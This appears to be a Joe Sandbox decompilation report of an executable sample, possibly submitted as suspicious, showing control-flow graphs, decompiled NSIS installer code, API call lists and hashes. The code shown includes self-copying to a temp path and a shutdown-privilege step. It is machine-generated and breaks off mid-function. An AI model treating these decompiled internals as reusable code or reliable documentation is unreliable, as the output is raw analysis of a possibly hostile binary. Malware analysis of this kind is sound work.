4859->4862 4863 405699 4859->4863 4860 4044c2 SendMessageW 4861 4056ab OleUninitialize 4860->4861 4861->4772 4862->4859 4863->4860 4864->4735 4865->4741 4866->4852 4868 403b42 4867->4868 4869 403b47 FreeLibrary GlobalFree 4868->4869 4870 403b0c 4868->4870 4869->4869 4869->4870 4870->4795 5459 40248a 5460 402da6 17 API calls 5459->5460 5461 
40249c 5460->5461 5462 402da6 17 API calls 5461->5462 5463 4024a6 5462->5463 5476 402e36 5463->5476 5466 402c2a 5467 4024de 5470 402d84 17 API calls 5467->5470 5472 4024ea 5467->5472 5468 402da6 17 API calls 5469 4024d4 lstrlenW 5468->5469 5469->5467 5470->5472 5471 402509 RegSetValueExW 5474 40251f RegCloseKey 5471->5474 5472->5471 5473 4032b4 31 API calls 5472->5473 5473->5471 5474->5466 5477 402e51 5476->5477 5480 4063b5 5477->5480 5481 4063c4 5480->5481 5482 4024b6 5481->5482 5483 4063cf RegCreateKeyExW 5481->5483 5482->5466 5482->5467 5482->5468 5483->5482 5484 40290b 5485 402da6 17 API calls 5484->5485 5486 402912 FindFirstFileW 5485->5486 5487 402925 5486->5487 5488 40293a 5486->5488 5489 402943 5488->5489 5492 406461 wsprintfW 5488->5492 5493 40651a lstrcpynW 5489->5493 5492->5489 5493->5487 5494 40190c 5495 401943 5494->5495 5496 402da6 17 API calls 5495->5496 5497 401948 5496->5497 5498 405c26 67 API calls 5497->5498 5499 401951 5498->5499 5500 732d10e1 5510 732d1111 5500->5510 5501 732d12b0 GlobalFree 5502 732d1240 GlobalFree 5502->5510 5503 732d11d7 GlobalAlloc 5503->5510 5504 732d12ab 5504->5501 5505 732d135a 2 API calls 5505->5510 5506 732d1312 2 API calls 5506->5510 5507 732d129a GlobalFree 5507->5510 5508 732d116b GlobalAlloc 5508->5510 5509 732d1381 lstrcpyW 5509->5510 5510->5501 5510->5502 5510->5503 5510->5504 5510->5505 5510->5506 5510->5507 5510->5508 5510->5509 5511 40190f 5512 402da6 17 API calls 5511->5512 5513 401916 5512->5513 5514 405b7a MessageBoxIndirectW 5513->5514 5515 40191f 5514->5515 5516 401491 5517 40557c 24 API calls 5516->5517 5518 401498 5517->5518 5519 402891 5520 402898 5519->5520 5521 402ba9 5519->5521 5522 402d84 17 API calls 5520->5522 5523 40289f 5522->5523 5524 4028ae SetFilePointer 5523->5524 5524->5521 5525 4028be 5524->5525 5527 406461 wsprintfW 5525->5527 5527->5521 5528 401f12 5529 402da6 17 API calls 5528->5529 5530 401f18 5529->5530 5531 402da6 17 API calls 5530->5531 5532 401f21 5531->5532 5533 402da6 17 API 
calls 5532->5533 5534 401f2a 5533->5534 5535 402da6 17 API calls 5534->5535 5536 401f33 5535->5536 5537 401423 24 API calls 5536->5537 5538 401f3a 5537->5538 5545 405b40 ShellExecuteExW 5538->5545 5540 401f82 5542 40292e 5540->5542 5546 406992 WaitForSingleObject 5540->5546 5543 401f9f CloseHandle 5543->5542 5545->5540 5547 4069ac 5546->5547 5548 4069be GetExitCodeProcess 5547->5548 5549 406923 2 API calls 5547->5549 5548->5543 5550 4069b3 WaitForSingleObject 5549->5550 5550->5547 5551 402f93 5552 402fa5 SetTimer 5551->5552 5553 402fbe 5551->5553 5552->5553 5554 403013 5553->5554 5555 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5553->5555 5555->5554 5556 732d1979 5557 732d199c 5556->5557 5558 732d19d1 GlobalFree 5557->5558 5559 732d19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5557->5559 5558->5559 5560 732d1312 2 API calls 5559->5560 5561 732d1b6e GlobalFree GlobalFree 5560->5561 5562 401d17 5563 402d84 17 API calls 5562->5563 5564 401d1d IsWindow 5563->5564 5565 401a20 5564->5565 5566 732d1774 5567 732d17a3 5566->5567 5568 732d1bff 20 API calls 5567->5568 5569 732d17aa 5568->5569 5570 732d17bd 5569->5570 5571 732d17b1 5569->5571 5573 732d17e4 5570->5573 5574 732d17c7 5570->5574 5572 732d1312 2 API calls 5571->5572 5577 732d17bb 5572->5577 5575 732d180e 5573->5575 5576 732d17ea 5573->5576 5578 732d15dd 3 API calls 5574->5578 5580 732d15dd 3 API calls 5575->5580 5579 732d1654 3 API calls 5576->5579 5581 732d17cc 5578->5581 5582 732d17ef 5579->5582 5580->5577 5583 732d1654 3 API calls 5581->5583 5584 732d1312 2 API calls 5582->5584 5585 732d17d2 5583->5585 5587 732d17f5 GlobalFree 5584->5587 5586 732d1312 2 API calls 5585->5586 5588 732d17d8 GlobalFree 5586->5588 5587->5577 5589 732d1809 GlobalFree 5587->5589 5588->5577 5589->5577 5590 401b9b 5591 401ba8 5590->5591 5592 401bec 5590->5592 5593 401c31 5591->5593 5599 401bbf 5591->5599 5594 401bf1 5592->5594 5595 401c16 GlobalAlloc 5592->5595 5597 406557 17 API calls 5593->5597 5603 40239d 

                        Control-flow Graph (legend: • Executed, • Not Executed)
                        C-Code - Quality: 79%
                        			_entry_() {
                        				WCHAR* _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				int _v24;
                        				int _v28;
                        				struct _TOKEN_PRIVILEGES _v40;
                        				signed char _v42;
                        				int _v44;
                        				signed int _v48;
                        				intOrPtr _v278;
                        				signed short _v310;
                        				struct _OSVERSIONINFOW _v324;
                        				struct _SHFILEINFOW _v1016;
                        				intOrPtr* _t88;
                        				WCHAR* _t92;
                        				char* _t94;
                        				void _t97;
                        				void* _t116;
                        				WCHAR* _t118;
                        				signed int _t120;
                        				intOrPtr* _t124;
                        				void* _t138;
                        				void* _t144;
                        				void* _t149;
                        				void* _t153;
                        				void* _t158;
                        				signed int _t168;
                        				void* _t171;
                        				void* _t176;
                        				intOrPtr _t178;
                        				intOrPtr _t179;
                        				intOrPtr* _t180;
                        				int _t189;
                        				void* _t190;
                        				void* _t199;
                        				signed int _t205;
                        				signed int _t210;
                        				signed int _t215;
                        				signed int _t217;
                        				int* _t219;
                        				signed int _t227;
                        				signed int _t230;
                        				CHAR* _t232;
                        				char* _t233;
                        				signed int _t234;
                        				WCHAR* _t235;
                        				void* _t251;
                        
                        				_t217 = 0x20;
                        				_t189 = 0;
                        				_v24 = 0;
                        				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                        				_v20 = 0;
                        				SetErrorMode(0x8001); // executed
                        				_v324.szCSDVersion = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				_v324.dwOSVersionInfoSize = 0x11c;
                        				if(GetVersionExW( &_v324) == 0) {
                        					_v324.dwOSVersionInfoSize = 0x114;
                        					GetVersionExW( &_v324);
                        					asm("sbb eax, eax");
                        					_v42 = 4;
                        					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                        				}
                        				if(_v324.dwMajorVersion < 0xa) {
                        					_v310 = _v310 & 0x00000000;
                        				}
                        				 *0x7a8b18 = _v324.dwBuildNumber;
                        				 *0x7a8b1c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                        				if( *0x7a8b1e != 0x600) {
                        					_t180 = E004068E7(_t189);
                        					if(_t180 != _t189) {
                        						 *_t180(0xc00);
                        					}
                        				}
                        				_t232 = "UXTHEME";
                        				do {
                        					E00406877(_t232); // executed
                        					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                        				} while ( *_t232 != 0);
                        				E004068E7(0xb);
                        				 *0x7a8a64 = E004068E7(9);
                        				_t88 = E004068E7(7);
                        				if(_t88 != _t189) {
                        					_t88 =  *_t88(0x1e);
                        					if(_t88 != 0) {
                        						 *0x7a8b1c =  *0x7a8b1c | 0x00000080;
                        					}
                        				}
                        				__imp__#17();
                        				__imp__OleInitialize(_t189); // executed
                        				 *0x7a8b20 = _t88;
                        				SHGetFileInfoW(0x79ff08, _t189,  &_v1016, 0x2b4, _t189); // executed
                        				E0040651A(0x7a7a60, L"NSIS Error");
                        				_t92 = GetCommandLineW();
                        				_t233 = L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ";
                        				E0040651A(_t233, _t92);
                        				_t94 = _t233;
                        				_t234 = 0x22;
                        				 *0x7a8a60 = 0x400000;
                        				_t251 = L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" " - _t234; // 0x22
                        				if(_t251 == 0) {
                        					_t217 = _t234;
                        					_t94 =  &M007B3002;
                        				}
                        				_t199 = CharNextW(E00405E16(_t94, _t217));
                        				_v16 = _t199;
                        				while(1) {
                        					_t97 =  *_t199;
                        					_t252 = _t97 - _t189;
                        					if(_t97 == _t189) {
                        						break;
                        					}
                        					_t210 = 0x20;
                        					__eflags = _t97 - _t210;
                        					if(_t97 != _t210) {
                        						L17:
                        						__eflags =  *_t199 - _t234;
                        						_v12 = _t210;
                        						if( *_t199 == _t234) {
                        							_v12 = _t234;
                        							_t199 = _t199 + 2;
                        							__eflags = _t199;
                        						}
                        						__eflags =  *_t199 - 0x2f;
                        						if( *_t199 != 0x2f) {
                        							L32:
                        							_t199 = E00405E16(_t199, _v12);
                        							__eflags =  *_t199 - _t234;
                        							if(__eflags == 0) {
                        								_t199 = _t199 + 2;
                        								__eflags = _t199;
                        							}
                        							continue;
                        						} else {
                        							_t199 = _t199 + 2;
                        							__eflags =  *_t199 - 0x53;
                        							if( *_t199 != 0x53) {
                        								L24:
                        								asm("cdq");
                        								asm("cdq");
                        								_t215 = L"NCRC" & 0x0000ffff;
                        								asm("cdq");
                        								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                        								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                        								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                        									L29:
                        									asm("cdq");
                        									asm("cdq");
                        									_t210 = L" /D=" & 0x0000ffff;
                        									asm("cdq");
                        									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                        									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                        									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                        										L31:
                        										_t234 = 0x22;
                        										goto L32;
                        									}
                        									__eflags =  *_t199 - _t230;
                        									if( *_t199 == _t230) {
                        										 *(_t199 - 4) = _t189;
                        										__eflags = _t199;
                        										E0040651A(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t199);
                        										L37:
                        										_t235 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                        										GetTempPathW(0x400, _t235);
                        										_t116 = E004034D9(_t199, _t252);
                        										_t253 = _t116;
                        										if(_t116 != 0) {
                        											L40:
                        											DeleteFileW(L"1033"); // executed
                        											_t118 = E0040307D(_t255, _v20); // executed
                        											_v8 = _t118;
                        											if(_t118 != _t189) {
                        												L68:
                        												E00403AEF();
                        												__imp__OleUninitialize();
                        												if(_v8 == _t189) {
                        													if( *0x7a8af4 == _t189) {
                        														L77:
                        														_t120 =  *0x7a8b0c;
                        														if(_t120 != 0xffffffff) {
                        															_v24 = _t120;
                        														}
                        														ExitProcess(_v24);
                        													}
                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                        														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                        														_v40.PrivilegeCount = 1;
                        														_v28 = 2;
                        														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                        													}
                        													_t124 = E004068E7(4);
                        													if(_t124 == _t189) {
                        														L75:
                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                        															goto L77;
                        														}
                        														goto L76;
                        													} else {
                        														_push(0x80040002);
                        														_push(0x25);
                        														_push(_t189);
                        														_push(_t189);
                        														_push(_t189);
                        														if( *_t124() == 0) {
                        															L76:
                        															E0040140B(9);
                        															goto L77;
                        														}
                        														goto L75;
                        													}
                        												}
                        												E00405B7A(_v8, 0x200010);
                        												ExitProcess(2);
                        											}
                        											if( *0x7a8a7c == _t189) {
                        												L51:
                        												 *0x7a8b0c =  *0x7a8b0c | 0xffffffff;
                        												_v24 = E00403BC9(_t265);
                        												goto L68;
                        											}
                        											_t219 = E00405E16(L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ", _t189);
                        											if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ") {
                        												L48:
                        												_t264 = _t219 - L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ";
                        												_v8 = L"Error launching installer";
                        												if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ") {
                        													_t190 = E00405AE5(__eflags);
                        													lstrcatW(_t235, L"~nsu");
                        													__eflags = _t190;
                        													if(_t190 != 0) {
                        														lstrcatW(_t235, "A");
                        													}
                        													lstrcatW(_t235, L".tmp");
                        													_t138 = lstrcmpiW(_t235, 0x7b4800);
                        													__eflags = _t138;
                        													if(_t138 == 0) {
                        														L67:
                        														_t189 = 0;
                        														__eflags = 0;
                        														goto L68;
                        													} else {
                        														__eflags = _t190;
                        														_push(_t235);
                        														if(_t190 == 0) {
                        															E00405AC8();
                        														} else {
                        															E00405A4B();
                        														}
                        														SetCurrentDirectoryW(_t235);
                        														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                        														if(__eflags == 0) {
                        															E0040651A(L"C:\\Users\\engineer\\AppData\\Local\\Temp", 0x7b4800);
                        														}
                        														E0040651A(0x7a9000, _v16);
                        														_t202 = "A" & 0x0000ffff;
                        														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                        														__eflags = _t144;
                        														_v12 = 0x1a;
                        														 *0x7a9800 = _t144;
                        														do {
                        															E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x120)));
                        															DeleteFileW(0x79f708);
                        															__eflags = _v8;
                        															if(_v8 != 0) {
                        																_t149 = CopyFileW(L"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe", 0x79f708, 1);
                        																__eflags = _t149;
                        																if(_t149 != 0) {
                        																	E004062DA(_t202, 0x79f708, 0);
                        																	E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x124)));
                        																	_t153 = E00405AFD(0x79f708);
                        																	__eflags = _t153;
                        																	if(_t153 != 0) {
                        																		CloseHandle(_t153);
                        																		_v8 = 0;
                        																	}
                        																}
                        															}
                        															 *0x7a9800 =  *0x7a9800 + 1;
                        															_t61 =  &_v12;
                        															 *_t61 = _v12 - 1;
                        															__eflags =  *_t61;
                        														} while ( *_t61 != 0);
                        														E004062DA(_t202, _t235, 0);
                        														goto L67;
                        													}
                        												}
                        												 *_t219 = _t189;
                        												_t222 =  &(_t219[2]);
                        												_t158 = E00405EF1(_t264,  &(_t219[2]));
                        												_t265 = _t158;
                        												if(_t158 == 0) {
                        													goto L68;
                        												}
                        												E0040651A(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t222);
                        												E0040651A(0x7b4000, _t222);
                        												_v8 = _t189;
                        												goto L51;
                        											}
                        											asm("cdq");
                        											asm("cdq");
                        											asm("cdq");
                        											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                        											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                        											while( *_t219 != _t205 || _t219[1] != _t168) {
                        												_t219 = _t219;
                        												if(_t219 >= L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ") {
                        													continue;
                        												}
                        												break;
                        											}
                        											_t189 = 0;
                        											goto L48;
                        										}
                        										GetWindowsDirectoryW(_t235, 0x3fb);
                        										lstrcatW(_t235, L"\\Temp");
                        										_t171 = E004034D9(_t199, _t253);
                        										_t254 = _t171;
                        										if(_t171 != 0) {
                        											goto L40;
                        										}
                        										GetTempPathW(0x3fc, _t235);
                        										lstrcatW(_t235, L"Low");
                        										SetEnvironmentVariableW(L"TEMP", _t235);
                        										SetEnvironmentVariableW(L"TMP", _t235);
                        										_t176 = E004034D9(_t199, _t254);
                        										_t255 = _t176;
                        										if(_t176 == 0) {
                        											goto L68;
                        										}
                        										goto L40;
                        									}
                        									goto L31;
                        								}
                        								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                        								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                        									goto L29;
                        								}
                        								_t178 =  *((intOrPtr*)(_t199 + 8));
                        								__eflags = _t178 - 0x20;
                        								if(_t178 == 0x20) {
                        									L28:
                        									_t36 =  &_v20;
                        									 *_t36 = _v20 | 0x00000004;
                        									__eflags =  *_t36;
                        									goto L29;
                        								}
                        								__eflags = _t178 - _t189;
                        								if(_t178 != _t189) {
                        									goto L29;
                        								}
                        								goto L28;
                        							}
                        							_t179 =  *((intOrPtr*)(_t199 + 2));
                        							__eflags = _t179 - _t210;
                        							if(_t179 == _t210) {
                        								L23:
                        								 *0x7a8b00 = 1;
                        								goto L24;
                        							}
                        							__eflags = _t179 - _t189;
                        							if(_t179 != _t189) {
                        								goto L24;
                        							}
                        							goto L23;
                        						}
                        					} else {
                        						goto L16;
                        					}
                        					do {
                        						L16:
                        						_t199 = _t199 + 2;
                        						__eflags =  *_t199 - _t210;
                        					} while ( *_t199 == _t210);
                        					goto L17;
                        				}
                        				goto L37;
                        			}
                        0x00403a95
                        0x00403a9c
                        0x00403aa3
                        0x00403aa3
                        0x00403aab
                        0x00403ab7
                        0x00403ac5
                        0x00403ad0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403ab9
                        0x00403ab9
                        0x00403aba
                        0x00403abc
                        0x00403abd
                        0x00403abe
                        0x00403ac3
                        0x00403ad2
                        0x00403ad4
                        0x00000000
                        0x00403ad4
                        0x00000000
                        0x00403ac3
                        0x00403ab7
                        0x00403a4e
                        0x00403a55
                        0x00403a55
                        0x0040386b
                        0x00403912
                        0x00403912
                        0x0040391e
                        0x00000000
                        0x0040391e
                        0x0040387c
                        0x00403884
                        0x004038d6
                        0x004038d6
                        0x004038dc
                        0x004038e3
                        0x00403931
                        0x00403933
                        0x00403938
                        0x0040393a
                        0x00403942
                        0x00403942
                        0x0040394d
                        0x00403959
                        0x0040395f
                        0x00403961
                        0x00403a34
                        0x00403a34
                        0x00403a34
                        0x00000000
                        0x00403967
                        0x00403967
                        0x00403969
                        0x0040396a
                        0x00403973
                        0x0040396c
                        0x0040396c
                        0x0040396c
                        0x00403979
                        0x00403981
                        0x00403988
                        0x00403990
                        0x00403990
                        0x0040399d
                        0x004039a9
                        0x004039b3
                        0x004039b3
                        0x004039b5
                        0x004039bc
                        0x004039c6
                        0x004039d2
                        0x004039d8
                        0x004039de
                        0x004039e1
                        0x004039eb
                        0x004039f1
                        0x004039f3
                        0x004039f7
                        0x00403a08
                        0x00403a0e
                        0x00403a13
                        0x00403a15
                        0x00403a18
                        0x00403a1e
                        0x00403a1e
                        0x00403a15
                        0x004039f3
                        0x00403a21
                        0x00403a28
                        0x00403a28
                        0x00403a28
                        0x00403a28
                        0x00403a2f
                        0x00000000
                        0x00403a2f
                        0x00403961
                        0x004038e5
                        0x004038e8
                        0x004038ec
                        0x004038f1
                        0x004038f3
                        0x00000000
                        0x00000000
                        0x004038ff
                        0x0040390a
                        0x0040390f
                        0x00000000
                        0x0040390f
                        0x0040388d
                        0x004038a5
                        0x004038b6
                        0x004038b7
                        0x004038bb
                        0x004038bd
                        0x004038cb
                        0x004038d2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004038d2
                        0x004038d4
                        0x00000000
                        0x004038d4
                        0x004037f7
                        0x00403803
                        0x00403808
                        0x0040380d
                        0x0040380f
                        0x00000000
                        0x00000000
                        0x00403817
                        0x0040381f
                        0x00403830
                        0x00403838
                        0x0040383a
                        0x0040383f
                        0x00403841
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403841
                        0x00000000
                        0x0040379e
                        0x00403747
                        0x00403749
                        0x00000000
                        0x00000000
                        0x0040374b
                        0x0040374f
                        0x00403753
                        0x0040375a
                        0x0040375a
                        0x0040375a
                        0x0040375a
                        0x00000000
                        0x0040375a
                        0x00403755
                        0x00403758
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403758
                        0x004036f1
                        0x004036f5
                        0x004036f8
                        0x004036ff
                        0x004036ff
                        0x00000000
                        0x004036ff
                        0x004036fa
                        0x004036fd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004036fd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004036cb
                        0x004036cb
                        0x004036cc
                        0x004036cd
                        0x004036cd
                        0x00000000
                        0x004036cb
                        0x00000000

                        APIs
                        • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                        • GetVersionExW.KERNEL32(?), ref: 00403556
                        • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                        • OleInitialize.OLE32(00000000), ref: 00403647
                        • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                        • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000020,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000000), ref: 004036B3
                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037E6
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403803
                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403817
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381F
                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
                        • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403933
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403942
                          • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040394D
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000000,?), ref: 00403959
                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
                        • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\aSsc9zh1ex.exe,0079F708,00000001), ref: 004039EB
                        • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
                        • OleUninitialize.OLE32(?), ref: 00403A3B
                        • ExitProcess.KERNEL32 ref: 00403A55
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
                        • ExitProcess.KERNEL32 ref: 00403AE9
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                        • String ID: "C:\Users\user\Desktop\aSsc9zh1ex.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\aSsc9zh1ex.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                        • API String ID: 3859024572-2423151299
                        • Opcode ID: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                        • Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
                        • Opcode Fuzzy Hash: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                        • Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 143 4056bb-4056d6 144 405865-40586c 143->144 145 4056dc-4057a3 GetDlgItem * 3 call 4044ab call 404e04 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405896-4058a3 144->147 148 40586e-405890 GetDlgItem CreateThread FindCloseChangeNotification 144->148 167 4057c1-4057c4 145->167 168 4057a5-4057bf SendMessageW * 2 145->168 150 4058c1-4058cb 147->150 151 4058a5-4058ab 147->151 148->147 152 405921-405925 150->152 153 4058cd-4058d3 150->153 155 4058e6-4058ef call 4044dd 151->155 156 4058ad-4058bc ShowWindow * 2 call 4044ab 151->156 152->155 162 405927-40592d 152->162 158 4058d5-4058e1 call 40444f 153->158 159 4058fb-40590b ShowWindow 153->159 164 4058f4-4058f8 155->164 156->150 158->155 165 40591b-40591c call 40444f 159->165 166 40590d-405916 call 40557c 159->166 162->155 169 40592f-405942 SendMessageW 162->169 165->152 166->165 170 4057d4-4057eb call 404476 167->170 171 4057c6-4057d2 SendMessageW 167->171 168->167 172 405a44-405a46 169->172 173 405948-405973 CreatePopupMenu call 406557 AppendMenuW 169->173 182 405821-405842 GetDlgItem SendMessageW 170->182 183 4057ed-405801 ShowWindow 170->183 171->170 172->164 180 405975-405985 GetWindowRect 173->180 181 405988-40599d TrackPopupMenu 173->181 180->181 181->172 184 4059a3-4059ba 181->184 182->172 187 405848-405860 SendMessageW * 2 182->187 185 405810 183->185 186 405803-40580e ShowWindow 183->186 188 4059bf-4059da SendMessageW 184->188 189 405816-40581c call 4044ab 185->189 186->189 187->172 188->188 190 4059dc-4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->182 192 405a01-405a28 SendMessageW 190->192 192->192 193 405a2a-405a3e GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                        C-Code - Quality: 95%
                        			E004056BB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                        				struct HWND__* _v8;
                        				long _v12;
                        				struct tagRECT _v28;
                        				void* _v36;
                        				signed int _v40;
                        				int _v44;
                        				int _v48;
                        				signed int _v52;
                        				int _v56;
                        				void* _v60;
                        				void* _v68;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				struct HWND__* _t94;
                        				long _t95;
                        				int _t100;
                        				void* _t108;
